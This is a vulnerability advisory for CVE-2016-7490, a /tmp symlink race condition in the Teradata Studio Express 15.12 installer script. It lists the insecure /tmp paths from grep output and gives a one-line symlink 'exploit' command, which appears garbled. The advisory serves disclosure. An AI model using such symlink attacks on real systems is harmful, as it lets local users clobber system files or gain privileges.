Teradata Studio Express 15.12.00.00 Race Condition

`Title: /tmp race condition in Teradata Studio Express v15.12.00.00 studioexpressinstall  
Author: Larry W. Cashdollar, @_larry0  
Date: 2016-10-03  
Download Site: http://downloads.teradata.com/download/tools/teradata-studio-express  
Vendor: Teradata  
Vendor Notified: 2016-10-03  
Vendor Contact: web form contact  
Description: Teradata Studio Express provides an information discovery tool that retrieves data from Teradata Database systems and allows the data to be manipulated and stored on the desktop. It is built on the Eclipse Rich Client Platform (RCP).   
Vulnerability:  
The installation script for TeradataStudioExpress.15.12.00.00 creates files in /tmp insecurely. A malicious local user could create a symlink in /tmp and possibly clobber system files or perhaps elevate privileges.  
  
$ grep -n "/tmp" studioexpressinstall   
  
33:ASKDIRFILE=/tmp/sqlajeaskdir  
41:DEF_TRACEFILE=/tmp/studioexinstall.log  
44:TMP=/tmp  
72:SQLAJEINPUTS=/tmp/studioexinputs  
90:RPM_OUT_FILE=/tmp/studioexinstall_rpmcmd.out  
103:SQLAJEINSTALL=/tmp/studioexpressinstall  
136: java -version > "/tmp/javaver" 2>&1  
137: verstring=`grep "java version" /tmp/javaver`  
143: jre64b=`grep "64-Bit" /tmp/javaver`  
212:rm -f /tmp/javaver   
341: tmptracefile=/tmp/studioexinstall.log.tmp #Temporary trace file.  
588:touch /tmp/checkstudioexinstall  
603:rm -f /tmp/checkstudioexinstall  
604:rm -f /tmp/studioexinstall_rpmcmd.out  
  
CVE-ID: CVE-2016-7490  
Export: JSON TEXT XML  
Exploit Code:  
aC/ $ ln -s /tmp/javaver /etc/passed  
Advisory: http://www.vapidlabs.com/advisory.php?v=174  
  
  
`